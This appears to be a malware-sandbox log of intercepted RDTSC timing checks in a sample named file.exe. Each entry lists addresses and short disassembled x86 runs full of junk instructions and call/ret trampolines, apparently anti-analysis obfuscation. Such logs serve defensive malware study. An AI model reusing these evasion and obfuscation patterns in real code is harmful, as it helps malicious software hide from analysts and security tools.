Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3815 second address: 9E381C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E499B second address: 9E49A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6841 second address: 9E68B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAA4B0AF1Fh 0x00000008 jmp 00007FFAA4B0AF28h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+12453B38h], ecx 0x00000019 push 00000000h 0x0000001b add di, 63ABh 0x00000020 sub dword ptr [ebp+122D2DE0h], edi 0x00000026 push 00000000h 0x00000028 call 00007FFAA4B0AF1Fh 0x0000002d pushad 0x0000002e mov eax, ebx 0x00000030 sub ebx, 6990326Fh 0x00000036 popad 0x00000037 pop edi 0x00000038 push eax 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FFAA4B0AF23h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E381C second address: 9E38A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FFAA4EF80C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f and edi, dword ptr [ebp+122D36A7h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov bh, 7Bh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov bh, dl 0x00000027 mov eax, dword ptr [ebp+122D1201h] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FFAA4EF80C8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 sbb bx, 6AFCh 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007FFAA4EF80C8h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jns 00007FFAA4EF80C6h 0x00000072 jmp 00007FFAA4EF80CCh 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E38A7 second address: 9E38AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E38AD second address: 9E38BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6A4E second address: 9E6A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E38BD second address: 9E38C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6A53 second address: 9E6A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E7BD4 second address: 9E7BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8A76 second address: 9E8A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6A59 second address: 9E6AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FFAA4EF80C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 xor dword ptr [ebp+122D1FE8h], edi 0x0000002a push dword ptr fs:[00000000h] 0x00000031 push edi 0x00000032 jmp 00007FFAA4EF80CFh 0x00000037 pop ebx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007FFAA4EF80C8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D20F0h] 0x0000005f pushad 0x00000060 mov ecx, edx 0x00000062 popad 0x00000063 mov eax, dword ptr [ebp+122D1245h] 0x00000069 xor bx, 9C3Ah 0x0000006e push FFFFFFFFh 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 jng 00007FFAA4EF80C6h 0x0000007a jg 00007FFAA4EF80C6h 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8A97 second address: 9E8AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FFAA4B0AF22h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 cld 0x00000011 mov dword ptr [ebp+122D198Dh], edi 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+12458467h], ebx 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6AF2 second address: 9E6AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8AC9 second address: 9E8ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E9ADF second address: 9E9AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E9CCC second address: 9E9CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FFAA4B0AF1Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jnc 00007FFAA4B0AF16h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9ECA42 second address: 9ECA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE94E second address: 9EE954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE954 second address: 9EE958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EF8BB second address: 9EF8C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBAD9 second address: 9EBAE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFAA4EF80C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBAE3 second address: 9EBB04 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FFAA4B0AF22h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBB04 second address: 9EBB0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBB0A second address: 9EBB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9ECCA5 second address: 9ECCC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAA4EF80D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EBBC3 second address: 9EBBD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jns 00007FFAA4B0AF16h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EAA80 second address: 9EAA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FFAA4EF80CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F18C0 second address: 9F18C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F18C7 second address: 9F1900 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAA4EF80D4h 0x00000008 jmp 00007FFAA4EF80CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FFAA4EF80DEh 0x00000018 jmp 00007FFAA4EF80D8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F1900 second address: 9F1916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB32 second address: 9EFB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB36 second address: 9EFB47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB47 second address: 9EFB4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFB4D second address: 9EFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99850F second address: 998513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 998513 second address: 998567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAA4B0AF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFAA4B0AF27h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FFAA4B0AF29h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007FFAA4B0AF20h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 998567 second address: 99856B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FA31B second address: 9FA321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FA321 second address: 9FA32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FA32A second address: 9FA32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC2DF second address: 9FC2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC2E3 second address: 9FC30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAA4B0AF1Ch 0x00000010 je 00007FFAA4B0AF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC30B second address: 9FC311 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC311 second address: 9FC34A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAA4B0AF18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FFAA4B0AF1Bh 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FFAA4B0AF26h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC34A second address: 9FC34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC34E second address: 9FC362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC362 second address: 9FC368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC368 second address: 9FC36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A012DA second address: A012FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FFAA4EF80C6h 0x0000000e jmp 00007FFAA4EF80D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A012FD second address: A01301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A03E97 second address: A03EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FFAA4EF80C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A04038 second address: A04068 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FFAA4B0AF16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FFAA4B0AF29h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A04068 second address: A0406C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08369 second address: A0839A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF26h 0x00000007 pushad 0x00000008 jmp 00007FFAA4B0AF22h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A084F4 second address: A084FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A084FA second address: A084FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A084FE second address: A0850E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08664 second address: A08673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FFAA4B0AF16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08673 second address: A08677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A08677 second address: A0867B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0867B second address: A08681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10945 second address: A10949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10C0D second address: A10C1F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAA4EF80C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10C1F second address: A10C36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FFAA4B0AF16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10ED2 second address: A10ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11075 second address: A1108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FFAA4B0AF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1108B second address: A110B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FFAA4EF80CEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A110B3 second address: A110B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A110B9 second address: A110D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAA4EF80CFh 0x0000000d jne 00007FFAA4EF80C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1151C second address: A11528 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAA4B0AF16h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11528 second address: A11534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007FFAA4EF80C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A178FC second address: A17900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A17900 second address: A1790C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16600 second address: A1663F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FFAA4B0AF26h 0x0000000a popad 0x0000000b jg 00007FFAA4B0AF38h 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ecx 0x00000017 push esi 0x00000018 jmp 00007FFAA4B0AF24h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16A9A second address: A16AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16D71 second address: A16D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16D75 second address: A16D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16F30 second address: A16F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16F34 second address: A16F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A17232 second address: A17249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF23h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A173BA second address: A173C0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9934CD second address: 9934D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1606E second address: A16074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16074 second address: A16078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16078 second address: A1607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2041B second address: A20421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A20421 second address: A2042D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D67FD second address: 9C097B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAA4B0AF27h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D36B3h] 0x00000015 lea eax, dword ptr [ebp+1248457Dh] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FFAA4B0AF18h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 jmp 00007FFAA4B0AF28h 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007FFAA4B0AF28h 0x00000041 pushad 0x00000042 jmp 00007FFAA4B0AF1Ch 0x00000047 jmp 00007FFAA4B0AF1Dh 0x0000004c popad 0x0000004d popad 0x0000004e mov dword ptr [esp], eax 0x00000051 clc 0x00000052 call dword ptr [ebp+122D19DCh] 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b jmp 00007FFAA4B0AF26h 0x00000060 pop eax 0x00000061 rdtsc
